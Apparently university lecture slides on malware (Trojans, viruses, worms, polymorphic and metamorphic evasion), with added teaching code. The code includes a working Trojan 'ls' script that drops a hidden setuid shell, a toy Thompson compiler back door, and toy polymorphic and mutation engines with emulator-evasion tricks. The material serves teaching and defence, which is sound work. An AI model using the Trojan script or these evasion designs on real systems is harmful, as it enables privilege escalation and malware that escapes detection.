
IT-Security 2

Chapter 2: Malware – Trojans, Viruses, Worms, and Payloads
Prof. Dr.-Ing. Ulrike Meyer
Overview on the Malware Chapters

§ Chapter 2: Malware – Trojans, Viruses, Worms, and Payloads
  § Motivation of malware writers
  § Classical malware classification with respect to spreading: virus, Trojan horse, worm
  § Malware classification by payload (malicious action)

§ Chapter 3: Malware – Botnets
  § Command-and-control protocols
  § Underground economy
  § Examples, including advanced persistent threats such as the Stuxnet worm
  § Detection and take-down

§ Chapter 4: Malware – Countermeasures

§ Chapter 5: Malware – Mobile Malware
  § The specifics of malware targeting (mainly) Android devices
IT-Security 2 -- Chapter 2 Malware 2


Malware = Malicious Software

§ According to NIST SP 800-83 (Rev. 1, 2013), malware is

"A program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity or availability of the victim's data, applications, or operating system or otherwise annoying or disrupting the victim"

§ Note that
  § The definition excludes accidental damage (e.g. a bug that destroys data), although the consequences may be similar; intent is what makes software malware
  § The owner of the system and the victim do not have to coincide (e.g. a compromised web server is used to attack its visitors)


Malware = Malicious Software

§ Malicious code often masquerades as good software
§ Some malicious programs need host programs
  § Trojan horses, logic bombs, viruses
§ Others can exist and propagate on their own
  § Worms
§ Many infection vectors and propagation methods
§ Modern malware often combines several types of malware
  § E.g. one piece of malware may combine Trojan, rootkit, and worm functionality


Motivation to Write Malware (1)

§ Experiment with how viruses can be written
§ Test one's own programming talent
§ Get famous around the world
§ Get a buzz, acknowledged or otherwise, from vandalism
§ Some consider that they are fighting authority


Motivation to Write Malware (2)

§ Some like "matching wits" with anti-virus vendors
§ Pentesting – attacking a system on behalf of, and with the authorisation of, its owner
  § Goal: identify vulnerabilities and close them before anyone can exploit them maliciously
§ Combating crime and terrorism
  § Very controversial use of "malware"
  § E.g. use a Trojan to spy on a suspect's online activities
  § Or use a "cleaning worm" that disinfects machines infected with a specific malware (with all the side effects of a worm nobody controls once released)


Motivation to Write Malware (3)

§ Direct financial gain and organized crime
  § Botnets, e.g. spam distribution, DDoS attacks
  § Ransomware: encrypt the victim's data, blackmail
  § Selling attack kits, payloads, exploits, etc.
  § Stealing and selling information
    § E.g. access credentials for eBay or Facebook accounts, credit card numbers, …
§ Indirect financial gain
  § Corporate espionage: stealing patented information, pricing strategies, information on new models, …


Simple Example for Malicious Code

§ Attacker writes a small shell script on a UNIX system:

    cp /bin/sh /tmp/.xyz        # hidden copy of the shell (dot-file, not shown by a plain ls)
    chmod u+s,o+x /tmp/.xyz     # setuid for the owner, executable by everyone
    rm ./ls                     # remove the evidence
    ls $*                       # run the real ls with the same arguments, so the output looks normal

§ Attacker saves this script in a file called "ls" in a directory the victim will work in and tricks the victim into executing it (e.g. because "." precedes /bin in the victim's PATH)
§ To the victim, the result looks as if the real ls command had been executed
§ What remains is a hidden copy of the shell, executable by anyone, whose setuid bit grants the effective user ID of whoever ran the script; if that was root, the attacker now has a root shell
§ Caveat: bash resets its effective UID on start-up unless invoked with -p, and many systems mount /tmp with nosuid, so whether the dropped shell is actually usable depends on the shell behind /bin/sh and the mount options


Trojan Horse

§ Program with an
  § overt purpose (known to the user) and a
  § covert purpose (unknown to the user)
§ Often simply called a Trojan
§ The example script on the previous slide is a Trojan horse
  § Overt purpose: list the files in the directory
  § Covert purpose: create a setuid shell
§ In the classical sense, Trojans do not replicate themselves
  § Modern Trojans often come with worm-like functionality
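The artefact the Trojan "ls" on the previous slides leaves behind is a setuid executable in a world-writable directory. The following POSIX shell function is an added example, not part of the lecture slides, that sweeps a directory for such files and reports whether each one is a byte-for-byte copy of a known shell. The default directory, the list of candidate shells and the output format are my assumptions.

```shell
#!/bin/sh
# Added example, not from the lecture: sweep a directory (default /tmp) for
# regular files carrying the setuid bit and flag the ones that are plain copies
# of a system shell, which is exactly what the Trojan 'ls' drops as /tmp/.xyz.
# The candidate shell list is an assumption; extend it for your platform.

find_stray_setuid() {
    dir="${1:-/tmp}"
    # -xdev: do not cross into other file systems; -perm -4000: setuid bit set.
    find "$dir" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        owner=$(ls -ld "$f" | awk '{print $3}')
        kind="unknown binary"
        for shell in /bin/sh /bin/bash /bin/dash /bin/zsh; do
            if [ -f "$shell" ] && cmp -s "$f" "$shell"; then
                kind="copy of $shell"
                break
            fi
        done
        # A setuid shell owned by root is a ready-made root shell for anyone.
        printf '%s owner=%s type="%s"\n' "$f" "$owner" "$kind"
    done
}

# Usage: list the findings, then strip the setuid bit from anything that
# should not carry it:
#   find_stray_setuid /tmp
#   chmod u-s /tmp/.xyz
```

Run it from cron or an integrity-monitoring job; a hit owned by root in /tmp, /var/tmp or a user's home directory is almost never legitimate.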


Examples for Covert Purposes (not restricted to Trojans)

§ Back doors
  § Methods of bypassing normal authentication
  § Gain remote access to a computer
  § While attempting to remain undetected
§ Keystroke loggers – steal passwords
§ Web clickers – run up advertising costs
§ Proxies – allow others to use your machine to launder connections
§ Spam engines
§ DDoS engines
§ …


Spreading of Trojans

§ Many Trojans are inadvertently installed by the user, e.g.
  § Trojan horses in purported hacking tools, free AV tools and other types of security software
  § Source or package repositories in which a Trojan has been planted in a popular package (a software supply-chain attack)
  § Third-party widgets that make sites "prettier" (e.g. calendars, visitor counters, etc.)
    § Example: a free widget for keeping visitor statistics operates fine from 2002 until 2006
    § In 2006, the widget starts pushing exploits on all visitors of pages linked to the counter
  § Website with thumbnails of adult videos
    § Clicking on a thumbnail brings up a page that looks like Windows Media Player and a prompt: "Windows Media Player cannot play video file. Click here to download missing Video ActiveX object."
    § The "codec" is actually a malware binary


End-User License Agreement Attacks

§ If you agree to a Trojan being installed does that make it legal?

§ Is it legal if the license agreement is deliberately confusing?

§ How carefully do you read license agreements, anyway?



How do we Avoid Installing Trojans?

§ Seemingly obvious solution
  § Install only trusted operating systems, applications, and tools
  § But: how do we decide whether or not to trust an executable?
§ Often claimed to be a safe approach
  § Use open source code
  § Compile the source code yourself
§ But:
  § Do you really check the source code?
  § And what about the compiler?


Ken Thompson's C Compiler Hack (1984)

§ Published in 1984: "Reflections on Trusting Trust" (Thompson's Turing Award lecture)
§ Describes how to
  § Write a self-reproducing code fragment (a program that outputs its own source)
  § In a first step, modify the compiler such that, when it compiles the login program, it inserts a back door
    § login with the back door accepts the user's correct password or a fixed master password (the same one for all users)
  § Now make the original login source open, such that anyone can check it for back doors: they will find none


The Login Program

[Figure: two build chains. Top: login source -> correct compiler -> login executable, which logs the user in only for the correct user password. Bottom: the same login source -> modified compiler -> login executable, which logs the user in for the user password or the magic password.]


What About the Compiler Source?

§ Modify the compiler again such that, when it compiles a new version of the compiler, the extra code to do the first step is automatically inserted
  § This is where the self-reproducing fragment is needed: the inserted code must carry its own source so that it can insert itself again
§ Recompile the compiler
  § The back door now persists in the compiler executable
§ Delete the source containing the modification and put the original compiler source back in place
§ So, what can now be published is
  § The original compiler source
  § The compiler executable that contains the modification
  § The original login source


The Compiler

[Figure: two build chains. Top: compiler source -> correct compiler -> compiler executable, which turns the login source into a correct login executable. Bottom: the same compiler source -> modified compiler -> compiler executable, which turns the same login source into a rigged login executable.]


The Point of Thompson's Hack

§ Demonstrated by Thompson's hack:
  § Even if your system uses verifiable software at the operating system, application and tools level, your compiler may still contain a Trojan
  § Open source does not entirely solve the problem: trust has to be rooted somewhere below the source
  § Known counter: build the compiler source with a second, independently produced compiler and compare the results (Wheeler's "diverse double-compiling"); this only helps if the second compiler is not rigged the same way

§ Thompson during his speech when receiving the Turing Award in 1983:
"The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code."
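The two steps on the preceding slides (rig the compiler so it back-doors login, then rig it so it re-inserts that modification whenever it compiles itself) can be played through in a few dozen lines. The following is an added example of my own, not code from the lecture or from Thompson's paper: a "compiler" here is a function that turns Python source text into a callable, the master password "open-sesame" and all program texts are invented, and the self-reproducing fragment is the usual quine trick of carrying one's own source in a string.

```python
"""Toy model of Thompson's "trusting trust" attack (added example, not the
lecture's code). A "compiler" is a function that turns Python source text into
a callable via exec(); this stands in for a real compiler producing a binary.

The rigged compiler recognises two inputs by pattern:
  * the login program: it adds a fixed master password ("open-sesame", an
    assumption for this demo) to the password check
  * the compiler itself: it re-inserts this same rigging logic, carried as a
    string of its own source (the self-reproducing fragment from the slides)
so the published sources of login and compiler stay clean while the compiler
*executable* keeps producing rigged binaries.
"""
import types

# Clean login source: only the stored password logs a user in.
LOGIN_SRC = '''
def login(user, password, passwd_db):
    return passwd_db.get(user) == password
'''

# Clean compiler source. Convention of this toy: the last top-level function
# a source defines is the program's entry point.
COMPILER_SRC = '''
import types
def compile_program(src):
    # honest compiler: execute the source, hand back its entry point
    ns = {}
    exec(src, ns)
    return [v for v in ns.values() if isinstance(v, types.FunctionType)][-1]
'''

# The rig. %r is filled with this very template, so the generated patch carries
# its own source in _T and can reproduce itself when it meets the compiler.
RIG_TEMPLATE = '''
_T = %r
def _rig(src):
    # Target 1, the login program: also accept the master password.
    if "def login(" in src:
        src = src.replace(
            "return passwd_db.get(user) == password",
            'return password == "open-sesame" or passwd_db.get(user) == password')
    # Target 2, the compiler: prepend this patch (rebuilt from _T) and hook it in.
    if "def compile_program(" in src and "_rig(" not in src:
        src = (_T %% _T) + src.replace(
            "def compile_program(src):",
            "def compile_program(src):\\n    src = _rig(src)")
    return src
'''
PATCH_SRC = RIG_TEMPLATE % RIG_TEMPLATE   # the self-reproducing fragment


def load(src):
    """The machine underneath: run source text, return its entry point."""
    ns = {}
    exec(src, ns)
    return [v for v in ns.values() if isinstance(v, types.FunctionType)][-1]


def honest_compiler():
    return load(COMPILER_SRC)


def build_rigged_compiler():
    """Step 1 from the slides: the attacker rigs the compiler once, by hand,
    and compiles that rigged source with the still-honest compiler."""
    rig = load(PATCH_SRC)
    return honest_compiler()(rig(COMPILER_SRC))


def demo():
    """Returns three login executables: an honest build, a build by the rigged
    compiler, and a build by a compiler that was itself produced from the
    CLEAN compiler source by the rigged compiler (step 2 from the slides)."""
    rigged = build_rigged_compiler()
    honest_login = honest_compiler()(LOGIN_SRC)
    rigged_login = rigged(LOGIN_SRC)
    next_gen_compiler = rigged(COMPILER_SRC)   # clean source in, rigged compiler out
    login_from_next_gen = next_gen_compiler(LOGIN_SRC)
    return honest_login, rigged_login, login_from_next_gen


if __name__ == "__main__":
    db = {"alice": "correct horse"}
    for name, prog in zip(("honest", "rigged", "next-gen"), demo()):
        print(f"{name:9s} real password: {prog('alice', 'correct horse', db)}"
              f"  master password: {prog('alice', 'open-sesame', db)}")
```

Neither LOGIN_SRC nor COMPILER_SRC contains the master password or the hook, which is the whole point: auditing the published sources cannot reveal the back door, only inspecting (or independently rebuilding) the compiler executable can.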


Example: Zlob Trojan

§ Also known as Trojan.Zlob, first detected in late 2005
§ Masquerades as a required video codec
  § also distributed along with online games
  § but mostly over instant messaging
§ Once installed, it displays pop-up ads
  § The ads inform users that their computer is infected with spyware and advertise a fake anti-spyware program
  § Clicking on the pop-up triggers the download of the fake anti-spyware program, in which another Trojan is hidden
  § This one causes random computer shutdowns or reboots
  § The payload of some versions also modified the DNS settings, so that name lookups were answered by attacker-controlled servers


More Recent Example for a Trojan: CryptoLocker

§ Ransomware that was active in 2013–2014
§ Trojan that targeted Windows machines
  § Propagated via e-mail attachments: a zip file containing an executable disguised as a PDF file
  § When run, encrypts certain types of files stored locally and on mounted network drives
  § Uses RSA public-key cryptography: a key pair is generated per victim, the files are encrypted under the public key (in practice via per-file symmetric keys wrapped with it), and the private key is stored only on the malware's control server
  § Displays a message which offers to decrypt the data if a payment is made, either through Bitcoin or a pre-paid cash voucher
§ The reported total amount of ransom gained by the attack varies
  § Reports range between 3 and 27 million $, partly due to the variance in the Bitcoin exchange rate and partly due to differing estimates of the unreported cases
§ Recovering the encrypted data was impossible until the database of private keys was recovered during the 2014 takedown of the associated botnet infrastructure


Computer Virus

A software fragment that attaches itself to some existing executable. A virus can replicate itself and pass on malicious code to other, non-malicious executables by modifying them
§ Analogy to a biological virus
  § Infects healthy subjects by attaching itself to the program
  § Either destroys or coexists with the program after infection
§ A computer virus can be transient or resident
  § The life span of a transient virus depends on its host program
    § The virus runs as long as the program to which it is attached executes
    § Terminates when the host program ends
    § Spreads while it is running
  § A resident virus locates itself in memory
    § Can remain active or be activated as a stand-alone program even after its host program ends
§ Someone has to run the infected program to initially execute the virus


The Nature of Viruses

§ Pieces of software that
  § can infect an executable file by modifying it
  § are thus embedded in the executable of a program, or in any other carrier of executable content
§ The modification includes
  § injecting a routine to make copies of the virus code
§ Whenever the infected executable comes into contact with an uninfected piece of code, a fresh copy of the virus is passed on
§ Whenever users exchange infected programs or files, the virus spreads to other machines
  § E.g. via disks, USB sticks, file sharing applications, e-mail attachments, instant messengers, social networks, …


Is a Virus a Trojan Horse or Not?

§ Some say yes
  § Overt action = the infected program's actions
  § Covert action = the virus' actions (infect, execute)
§ Others say no
  § Overt purpose = the virus' actions (infect, execute)
  § Covert purpose = none
§ Semantic, philosophical differences
  § Defences against Trojan horses also inhibit computer viruses


Viruses History (1)

§ Programmers for the Apple II wrote some of the earliest viruses
  § Not called viruses at the time; very experimental
  § E.g. Elk Cloner, written by Richard Skrenta in 1982
    § Resulted in the first large-scale computer virus outbreak
    § Boot sector virus that spread over infected floppy disks
    § Infected computers would display a short poem on every 50th boot
    § When a computer was booted from an infected disk, a copy of the virus was placed in the computer's memory
    § Any uninfected disk inserted afterwards would then also be infected with the virus

Elk Cloner: The program with a personality

It will get on all your disks
It will infiltrate your chips
Yes, it's Cloner!
It will stick to you like glue
It will modify RAM too
Send in the Cloner!


Viruses History (2)

§ Fred Cohen, 1983
  § Graduate student who described a self-replicating computer program
  § His advisor (Leonard Adleman) named it "computer virus"
  § Tested the idea on UNIX systems and a UNIVAC 1108 system


Parts of a Virus

§ Infection mechanism (infection vector) – the means by which a virus spreads or propagates, enabling it to replicate
§ Trigger – the event or condition that determines when the payload is activated or delivered
§ Payload – what the virus does besides spreading; the payload may involve damage or may involve benign but noticeable activity


Typical Phases in the Lifetime of a Virus

§ Dormant phase – the virus is idle and waiting to be activated
§ Propagation phase – the virus places a copy of itself (or a mutation of it) into other programs or into certain system areas on a disk
§ Triggering (activating) phase – the virus is activated to perform the functionality for which it was created; can be caused by e.g. the number of copies made of this copy, a date and time, …
§ Execution phase – the malicious function (payload) is performed (executed), e.g. a message is displayed on screen, programs or data files are destroyed


Computer Virus – Classification by Target

§ Boot sector infector
  § Infects a boot record and spreads when a system is booted from the disk containing the virus
§ File infector / executable infector
  § Infects files that the operating system or shell consider executable
§ Macro virus
  § Infects files with macro or scripting code that is interpreted by an application
§ Multipartite virus
  § Infects files in multiple ways. Typically, a multipartite virus is capable of infecting multiple types of files (e.g. boot sectors and executables), so that virus eradication must deal with all of the possible sites of infection


Executable Infectors

Before infection (offsets in bytes):

    | Header | Executable code |
    0        100               1000
             ^ first program instruction to be executed

After infection:

    | Header | Virus code | Executable code |
    0        100          200               1100
             ^ the entry point now hits the virus, which afterwards jumps to the original code at 200

§ A virus that infects executable programs
  § becomes part of an ordinary executable
  § e.g. adds itself to one end, saves the old code, inserts a branch to it
  § Easy to detect, as the length of the original executable increases
  § Consequence: more sophisticated viruses hide the increase, e.g. by
    § overwriting an (unused) part of the original code ("cavity" infection)
    § compressing the original executable


Early Example for an Executable Infector

§ Jerusalem (Israeli) virus, first spotted in 1987 in Jerusalem
  § DOS file virus that infects every executable except for COMMAND.COM
  § Checks whether the system is already infected
    § If not, installs itself memory-resident and hooks the requests to execute files
  § Checks the date
    § Unless it is a Friday the 13th (in a year other than 1987), infect all programs that are run
    § Otherwise, set a destructive flag: delete, rather than infect, the files
  § Then: check all calls asking for files to be executed
    § Do nothing for COMMAND.COM
    § Otherwise, infect or delete
§ Programming error in the virus:
  § .EXE files are continuously re-infected and grow on each re-infection until they are too large to load into memory


Macro Viruses

§ A macro …
  § is an executable program written in a scripting language, embedded in a file generated with an application
  § e.g. embedded in a word processing document or spreadsheet
§ A macro virus …
  § is composed of a sequence of instructions that are interpreted by an application (e.g. Word, Excel) rather than executed directly by the CPU
  § is largely platform independent (runs wherever the application runs)
  § spreads easily, as documents are exchanged more often than programs
§ When an infected document is opened, the virus copies itself into the global macro file (the default template) and makes itself auto-executing
  § Invoked whenever any document is opened or created
§ Decreased in popularity as detection and warning tools were embedded directly in applications like Word (macros stay disabled unless the user enables them); note that macro documents later returned as a common first stage that merely downloads other malware, which is why the user prompt is still an attack surface


Computer Viruses – Classification by Concealment Strategy

§ Encrypted virus
§ Stealth virus – hides the infection from the operating system and from scanners, e.g. by intercepting file reads (rootkit techniques)
§ Polymorphic virus
§ Metamorphic virus


Encrypted Viruses

§ A virus that is enciphered except for a small decryption routine
  § Detecting the virus by signature is now much harder, as most of the virus is encrypted

[Figure: the stored virus code consists of the plain decryption routine (which holds the decryption key) followed by the encrypted virus code.]


Polymorphic Viruses

§ A virus that changes its form each time it inserts itself into another program
  § While the functionality stays the same
  § Idea: prevent signature detection by changing the "signature", i.e. the instructions used for the decryption routine
  § Simplest form: encrypt the same virus body with a different key on each infection
§ More advanced
  § At the instruction level: substitute instructions
  § At the algorithm level: different algorithms to achieve the same purpose
  § Possible also for the decryption routine itself
§ Toolkits supporting virus writers
  § E.g. Mutation Engine (MtE), Trident Polymorphic Engine (TPE)


Anti-Virus Technologies

§ Simple anti-virus scanners
  § Look for signatures (fragments of known virus code)
  § Heuristics for recognizing code associated with viruses
    § e.g. polymorphic viruses often use decryption loops
  § Integrity checking to find modified files
    § Record file sizes, checksums, MACs (keyed hashes of the contents)
§ Generic decryption and emulation
  § Emulate CPU execution for a few hundred instructions, recognize the known body after the virus has decrypted itself
  § Does not work very well against mutating viruses and viruses not located near the beginning of the infected executable
  § The virus decryptor can start with millions of NOPs to exhaust the emulation budget


Detecting an Encrypted Virus by Emulation

[Figure: the virus randomly generates a new key and the corresponding decryptor code for each copy, yielding mutations A, B and C that all decrypt to the same virus body.]

To detect an unknown mutation of a known virus, emulate CPU execution until the current sequence of instruction opcodes matches the known sequence for the virus body
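The four slides above (encrypted viruses, polymorphic decryptors, signature scanning versus generic decryption, and the NOP-sled trick against emulation) fit into one small model. The following is an added example of my own, not code from the lecture: the "virus body" is a byte string, the "decryptor" is a tiny invented header that a scanner can emulate, three interchangeable decryptor variants (XOR/ADD/SUB) stand in for instruction-level polymorphism, and the emulator gives up after a fixed instruction budget. All formats, constants and the sample body are constructed for the demo.

```python
"""Added example (not from the slides): a toy encrypted/polymorphic virus body
and the two detection strategies the slides contrast. Every format here is
invented for the demo: the 'virus body' is just a byte string, the 'decryptor'
is a tiny header that a scanner can emulate, and the NOP sled models the
"decryptor starts with millions of NOPs" trick."""
import os
import secrets
import struct

# Constructed sample virus body and the signature an AV product would hold for it.
VIRUS_BODY = b"\xeb\x0e" + b"PAYLOAD:infect-every-exe" + b"\xc3"
BODY_SIGNATURE = b"PAYLOAD:infect-every-exe"

NOP = 0x90
# Polymorphism at the instruction level: three interchangeable decryptor
# variants. The op byte tells the emulator which arithmetic the stub undoes.
ENCRYPT_OPS = {
    b"X": lambda p, k: p ^ k,             # body XORed with the key stream
    b"A": lambda p, k: (p + k) & 0xFF,    # body ADDed with the key stream
    b"S": lambda p, k: (p - k) & 0xFF,    # body SUBtracted with the key stream
}
DECRYPT_OPS = {
    b"X": lambda c, k: c ^ k,
    b"A": lambda c, k: (c - k) & 0xFF,
    b"S": lambda c, k: (c + k) & 0xFF,
}


def _transform(data, key, fn):
    return bytes(fn(b, key[i % len(key)]) for i, b in enumerate(data))


def make_infected_copy(body=VIRUS_BODY, nop_sled=0, key=None, op=None):
    """One infection: fresh random key, fresh decryptor variant, optional NOP
    sled in front. On-disk layout (invented):
        [NOP * nop_sled][op:1][key_len:1][key][body_len:4 LE][encrypted body]
    """
    op = op or secrets.choice(list(ENCRYPT_OPS))
    key = key or os.urandom(4)
    enc = _transform(body, key, ENCRYPT_OPS[op])
    return (bytes([NOP]) * nop_sled + op + bytes([len(key)]) + key
            + struct.pack("<I", len(body)) + enc)


def signature_scan(blob, sig=BODY_SIGNATURE):
    """Plain signature match on the bytes as stored: defeated by any encryption."""
    return sig in blob


def emulate_and_scan(blob, sig=BODY_SIGNATURE, budget=500):
    """Generic decryption: step through the file like a CPU emulator, let the
    decryptor do its work, then match the recovered body. Gives up after
    `budget` emulated instructions, which a long NOP sled exploits."""
    pc = 0
    while pc < len(blob) and blob[pc] == NOP:   # one emulated instruction per NOP
        pc += 1
        if pc > budget:
            return False                         # emulation budget exhausted
    op = blob[pc:pc + 1]
    if op not in DECRYPT_OPS or len(blob) < pc + 2:
        return False                             # no decryptor here
    key_len = blob[pc + 1]
    key = blob[pc + 2:pc + 2 + key_len]
    p = pc + 2 + key_len
    if len(blob) < p + 4 or not key:
        return False
    (n,) = struct.unpack_from("<I", blob, p)
    body = _transform(blob[p + 4:p + 4 + n], key, DECRYPT_OPS[op])
    return sig in body


def distinct_copies(n=20):
    """How many of n infections look different on disk (expected: all of them)."""
    return len({make_infected_copy() for _ in range(n)})
```

The constant part of each copy is only the one-byte op and the length fields, which is why real scanners hunt for the decryptor loop heuristically; the budget check shows why that budget, not the emulator's correctness, is the usual limit.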


Metamorphic Viruses

§ Obvious next step: mutate the virus body, too!
  § The virus can carry its source code (which deliberately contains some useless junk) and recompile itself
  § Apparition virus (Win32)
    § The virus first looks for an installed compiler
    § The virus changes the junk in its source and recompiles itself
    § The new binary mutation looks completely different!
§ Mutation is common in macro and script viruses
  § Macros/scripts are usually interpreted, not compiled, so the source is at hand for rewriting


Obfuscation and Anti-Debugging

§ Common in worms, viruses, bots
  § Goal: prevent analysis of the code and signature-based detection, foil reverse engineering
  § Insert garbage opcodes and change the control structure
  § Different code in each instance
  § The effect of code execution is the same, but difficult to detect by passive (static) analysis
  § Packed binaries
§ Detect debuggers and virtual machines, terminate execution


Examples for Mutation / Obfuscation Techniques

§ Same code, different register names
  § Regswap (Win32)
§ Same code, different subroutine order
  § BadBoy (DOS), Ghost (Win32)
  § If n subroutines, then n! possible mutations
§ Decrypt the virus body instruction by instruction, push the instructions on the stack, insert and remove jumps, rebuild the body on the stack
  § Zmorph (Win95)
  § Can be detected by emulation, because the rebuilt body has a constant instruction sequence
§ …


Mutation Engines

§ Real Permutating Engine (RPME), ADMutate, etc.
  § Large set of obfuscating techniques
  § Instructions are reordered, branch conditions reversed
  § Jumps and NOPs inserted in random places
  § Garbage opcodes inserted in unreachable code areas
  § Instruction sequences replaced with other instructions that have the same effect, but different opcodes
    § Mutate SUB EAX, EAX into XOR EAX, EAX, or
      PUSH EBP; MOV EBP, ESP into PUSH EBP; PUSH ESP; POP EBP
§ There is no constant, recognizable virus body!
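The transformations listed on the last three slides (equivalent-instruction substitution with exactly the two idioms above, junk insertion, and subroutine reordering with its n! layouts) can be tried out on a toy instruction set. The following is an added example of my own, not the lecture's code and not any real engine: the register machine, its instruction tuples, the sample program and the 2-instruction "signature" are all invented for the demo. The interpreter is there so that one can check that every mutant still computes the same result, which is the property the slides' emulation-based detectors rely on.

```python
"""Added example (not from the slides or any real engine): a toy mutation
engine for a tiny register machine. It applies three of the transformations
the slides list, equivalent-instruction substitution (SUB r,r / XOR r,r /
MOV r,0; PUSH EBP; MOV EBP,ESP -> PUSH EBP; PUSH ESP; POP EBP), random NOP
insertion and subroutine reordering, and a small interpreter shows that every
mutant computes the same result while the original's instruction-sequence
signature is gone. Instruction set and program are invented for the demo."""
import random

# A program is a dict: subroutine name -> list of instruction tuples.
# Operands are register names (str) or immediates (int). Entry point: "main".
ORIGINAL = {
    "main": [("mov", "eax", 5), ("call", "double"), ("call", "finish"), ("ret",)],
    "double": [("push", "ebp"), ("mov", "ebp", "esp"),
               ("add", "eax", "eax"), ("pop", "ebp"), ("ret",)],
    "finish": [("sub", "ebx", "ebx"), ("add", "ebx", "eax"), ("ret",)],
}
# A 2-instruction signature a scanner might hold for the original body.
ORIGINAL_SIGNATURE = (("sub", "ebx", "ebx"), ("add", "ebx", "eax"))


def _zeroed_register(ins):
    """Register cleared by ins if ins is one of the zeroing idioms, else None."""
    if ins[0] in ("sub", "xor") and ins[1] == ins[2]:
        return ins[1]
    if ins[0] == "mov" and ins[2] == 0:
        return ins[1]
    return None


def mutate_block(block, rng):
    out, i = [], 0
    while i < len(block):
        ins = block[i]
        r = _zeroed_register(ins)
        if r is not None:
            # same effect, different opcode: pick an idiom other than the current one
            alts = [a for a in (("sub", r, r), ("xor", r, r), ("mov", r, 0)) if a != ins]
            out.append(rng.choice(alts))
        elif ins == ("push", "ebp") and block[i + 1:i + 2] == [("mov", "ebp", "esp")]:
            out += [("push", "ebp"), ("push", "esp"), ("pop", "ebp")]
            i += 1                                   # consumed the MOV as well
        else:
            out.append(ins)
        if rng.random() < 0.5:
            out.append(("nop",))                    # junk in random places
        i += 1
    return out


def mutate(program, rng):
    """Returns (mutated program, subroutine layout order); n subroutines allow n! layouts."""
    mutated = {name: mutate_block(block, rng) for name, block in program.items()}
    order = list(program)
    rng.shuffle(order)
    return mutated, order


def layout(program, order):
    """The instruction stream as it would sit on disk: subroutines in layout order."""
    return [ins for name in order for ins in program[name]]


def signature_present(stream, sig):
    sig = list(sig)
    return any(stream[i:i + len(sig)] == sig for i in range(len(stream) - len(sig) + 1))


def run(program, entry="main"):
    """Interpret the program; the 'result' is the final value of EBX."""
    regs = {"eax": 0, "ebx": 0, "ebp": 0, "esp": 1000}
    stack, calls = [], []
    val = lambda x: regs[x] if isinstance(x, str) else x
    name, pc = entry, 0
    for _ in range(10_000):                           # runaway guard
        ins = program[name][pc]
        pc += 1
        op = ins[0]
        if op == "nop":
            pass
        elif op == "mov":
            regs[ins[1]] = val(ins[2])
        elif op == "add":
            regs[ins[1]] = (regs[ins[1]] + val(ins[2])) & 0xFFFFFFFF
        elif op == "sub":
            regs[ins[1]] = (regs[ins[1]] - val(ins[2])) & 0xFFFFFFFF
        elif op == "xor":
            regs[ins[1]] ^= val(ins[2])
        elif op == "push":                            # x86 semantics: value before ESP moves
            stack.append(regs[ins[1]])
            regs["esp"] -= 4
        elif op == "pop":
            regs["esp"] += 4
            regs[ins[1]] = stack.pop()
        elif op == "call":
            calls.append((name, pc))
            name, pc = ins[1], 0
        elif op == "ret":
            if not calls:
                return regs["ebx"]
            name, pc = calls.pop()
        else:
            raise ValueError(f"unknown op {op}")
    raise RuntimeError("program did not terminate")


def mutants(n=5, seed=7):
    """n mutants of ORIGINAL from a fixed seed, as (program, layout_order) pairs."""
    rng = random.Random(seed)
    return [mutate(ORIGINAL, rng) for _ in range(n)]
```

Because the substitution step always picks a different idiom, no mutant ever carries the original SUB/ADD pair back to back, so a byte signature of that pair misses every copy; running the mutant (as an emulator would) still yields the same EBX, which is the behavioural invariant a detector has to fall back on.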


Example of Zperm Mutation

[Figure not reproduced] From Szor and Ferrie, "Hunting for Metamorphic", Symantec White Paper, 2001


Putting It All Together: Zmist

§ Zmist was written in 2001 by the Russian virus writer Z0mbie
  § Technique: code integration
  § The virus merges itself into the instruction flow of its host
  § "Islands" of code are integrated into random locations in the host program and linked by jumps
  § When/if the virus code is run, it infects every available Portable Executable
  § The randomly inserted virus entry point may not be reached in a particular execution


MISTFALL Disassembly Engine

§ To integrate itself into the host's instruction flow, the virus must disassemble and rebuild the host binary
§ This is very tricky
  § Addresses are based on offsets, which must be recomputed when new instructions are inserted
  § Iterative process: rebuild with new addresses, see if branch destinations changed, then rebuild again
  § Requires 32 MB of RAM and explicit section names (DATA, CODE, etc.) in the host binary – does not work with every file


Simplified Zmist Infection Process

§ Pick a Portable Executable binary smaller than 448 KB
§ Disassemble it, insert space for the new code blocks, and generate a new binary (recomputing all addresses)
§ Insert the mutated virus body
  § split into jump-linked "islands"
  § mutate opcodes (XOR ↔ SUB, OR ↔ TEST)
  § swap register moves and PUSH/POP, etc.
§ Encrypt the virus body by XOR (or ADD, SUB) with a randomly generated key and insert a mutated decryptor
  § the decryptor must restore the host's registers to preserve the host's functionality
§ Insert random garbage instructions using the Executable Trash Generator
§ Randomly insert an indirect call or jump to the decryptor's entry point, or rely on the instruction flow to reach it


Computer Worms

§ Worms propagate by exploiting software vulnerabilities
  § A worm is a program that actively seeks machines to infect
§ Each infected machine serves as an automated launching pad for attacks on other machines
§ Gains access to each new machine by exploiting software vulnerabilities in client or server programs
§ Worms spread from system to system via
  § Network connections
  § Shared media (USB drives, CDs, DVDs, etc.)
  § …


Typical Means of Replication

§ E-mail or instant messengers
  § The worm e-mails a copy of itself to other systems, or
  § sends itself as an attachment via an instant messaging service
  § The code is executed when the e-mail is viewed or the attachment opened
§ File sharing
  § The worm creates a copy of itself on e.g. a USB drive and executes when the drive is connected to another system, using the autorun mechanism
§ Remote execution capability
  § The worm executes a copy of itself on another system by using a remote execution facility or by exploiting a program flaw in a network service
§ Remote file access or transfer capability
  § Used by worms to copy themselves from one system to another


Phases in the Lifetime of a Worm

§ Same as for viruses: dormant, propagation, triggering, execution
§ Typical functions of the propagation phase
  § Search for appropriate access mechanisms to other systems to infect
    § Examine host tables, address books, buddy lists, trusted peers, …
    § Scan possible target host addresses
    § Search for removable media devices
  § Use the access mechanism found to transfer a copy of itself to the remote system and cause the copy to be run
  § May also check whether the system has previously been infected


Target Discovery

§ Scanning
  § If a worm spreads via a software vulnerability in a remotely accessible network service, it must identify target systems running the vulnerable service
§ Address scanning strategies
  § Random
    § The infected host probes random addresses in the IP address space
    § Easy to detect due to the high volume of traffic generated (most probes hit unused or invulnerable addresses)
  § Hit-list
    § First compile a list of candidate targets (slowly, such that no suspicion is raised)
    § Then start trying to infect the candidate targets (fast)
    § Provide each successfully infected machine with part of the list
  § Topological
